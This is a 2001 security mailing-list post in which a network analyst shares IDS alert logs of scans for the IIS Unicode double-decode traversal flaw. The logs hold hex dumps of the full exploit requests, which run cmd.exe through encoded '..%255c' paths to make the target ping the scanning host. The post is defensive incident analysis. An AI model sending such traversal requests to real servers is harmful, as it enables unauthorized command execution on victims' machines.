Security Incidents mailing list archives

Unusual IIS decode requests

From: "Jason Robertson" <jason () ifutureinc com>
Date: Sun, 29 Jul 2001 16:59:14 -0400

Hrm.. well I just received something today, well a few days ago.. I just got around to 
writing this up.  (I must work to hard, doing this on a sunday)

Anyways, as it looks, this user was attempting to find IIS servers that were 
unpatched for the Unicode Bug.  But what makes this one unusual is that the 
user instead of the common winnt/cmd.exe /c dir c: this user instead used 
winnt/cmd.exe /c ping -n 1 -l 128 -w 1, which I find pretty unusual.

But it does seem to be a smart method of testing, as this does elimate some of 
the overhead, that the dir c: could timeout, if and only if someone would put a large
number of files in c:\, and to really be annoying put a large number of 0byte files in 
C:\, this could give you a large number of files, with very low number of wasted 
space(though it still is a waste of space because of the name, time, acl entries)
but what can you do



[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:13pm    24.41.72.83:1712 -> 216.18.61.203:80
TTL: 47 TOS: 0x224      ID:0
***AP**F Seq: 672966764 Ack: 2100864331 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:13pm    24.41.72.83:1714 -> 216.18.61.202:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 680331733 Ack: 2100928858 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:13pm    24.41.72.83:1715 -> 216.18.61.201:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 684366937 Ack: 2101034143 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:16pm    24.41.72.83:1711 -> 216.18.61.205:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 676101846 Ack: 2101820142 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS multiple decode attempt [**]
Jul 27,01 12:37:22pm    24.41.72.83:1946 -> 216.18.61.205:80
TTL: 47 TOS: 0x0        ID:0
***AP*** Seq: 676258451 Ack: 2106779224 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
2535632E2E25356377696E6E742F73797374656D        %5c..%5cwinnt/system
33322F636D642E6578653F2F632B70696E672B2D        32/cmd.exe?/c+ping+-
6E2B312B2D6C2B3132382B2D772B312B32342E34        n+1+-l+128+-w+1+24.4
312E37322E383320485454502F312E300A0A0000        1.72.83.HTTP/1.0....
3C85034038700140CF0700006ECD004020990408        <..@8p.@....n..@....
446A0140C04812401ECE00408C71014098720140        Dj.@.H.@...@.q.@.r.@
2C99040801000000F28204086E43124020990408        ,...........nC.@....
446A0140C04812400100000060431240006B0140        Dj.@.H.@....`C.@.k.@
10F6FFBFA185040820990408009A0408                ................    

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:25pm    24.41.72.83:1701 -> 216.18.61.216:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 672736508 Ack: 2100687070 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:28pm    24.41.72.83:2151 -> 216.18.61.207:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 690117489 Ack: 2106691395 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS multiple decode attempt [**]
Jul 27,01 12:37:55pm    24.41.72.83:1709 -> 216.18.61.206:80
TTL: 47 TOS: 0x0        ID:0
***AP*** Seq: 679791880 Ack: 2118977419 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
2535632E2E25356377696E6E742F73797374656D        %5c..%5cwinnt/system
33322F636D642E6578653F2F632B70696E672B2D        32/cmd.exe?/c+ping+-
6E2B312B2D6C2B3132382B2D772B312B32342E34        n+1+-l+128+-w+1+24.4
312E37322E383320485454502F312E300A0A0000        1.72.83.HTTP/1.0....
3C85034038700140CF0700006ECD004020990408        <..@8p.@....n..@....
446A0140C04812401ECE00408C71014098720140        Dj.@.H.@...@.q.@.r.@
2C99040801000000F28204086E43124020990408        ,...........nC.@....
446A0140C04812400100000060431240006B0140        Dj.@.H.@....`C.@.k.@
10F6FFBFA185040820990408009A0408                ................    

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:40:20pm    24.41.72.83:1843 -> 216.18.61.201:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 686495535 Ack: 2105591950 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................


------- End of forwarded message -------

---
Jason Robertson                
Network Analyst            
jason () ifutureinc com    
http://www.astroadvice.com      

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Current thread:

Unusual IIS decode requests Jason Robertson (Jul 29)
- Re: Unusual IIS decode requests Thomas M. Ferris (Jul 30)